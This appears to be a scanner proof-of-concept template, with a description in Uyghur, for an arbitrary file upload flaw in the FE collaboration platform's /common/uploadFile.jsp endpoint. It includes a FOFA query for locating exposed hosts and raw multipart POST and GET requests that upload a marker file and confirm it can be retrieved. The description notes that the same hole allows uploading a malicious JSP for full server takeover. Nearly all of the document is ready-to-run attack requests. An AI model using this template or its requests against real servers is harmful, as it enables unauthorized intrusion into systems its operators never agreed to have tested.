Arbitrary file upload vulnerability
چۈشەندۈرىشى
FE سودا ھەمكارلىق سۇپىسىنىڭ /common/uploadFile.jsp كۆرۈنمە يۈزىدە خالىغان ھۆججەت يوللاش يوچۇقى بار. ھۇجۇم قىلغۇچى يامان غەرەزلىك JSP ھۆججىتىنى يۈكلەپ مۇلازىمېتىردا ئىجرا قىلالايدۇ ، بۇ ئارقىلىق مۇلازىمېتىرنى پۈتۈنلەي كونترول قىلالايدۇ.
fofa-query
body="FE协作"POC
variables:
rand: "{{rand_int(100000, 999999)}}"
fname: "{{rand_int(100000, 999999)}}"
http:
- raw:
- |
POST /common/uploadFile.jsp?action=save&savePath=/images/upload/&fileName=123.jpg&title1=%C9%CF%B4%AB%CE%C4%BC%FE&title2=%D1%A1%D4%F1%CE%C4%BC%FE&allowsize=null&extName=.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.1018.84 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123456789
Accept: */*
------WebKitFormBoundary123456789
Content-Disposition: form-data; name="accessory"; filename="{{fname}}.txt"
Content-Type: application/octet-stream
test_{{rand}}
------WebKitFormBoundary123456789--
- |
GET /images/upload/{{fname}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.2331.38 Safari/537.36
- |
GET {{file}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.2331.38 Safari/537.36
extractors:
- type: regex
part: body
name: file
internal: true
regex:
- '/images/upload/(\d+.txt)'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "test_{{rand}}"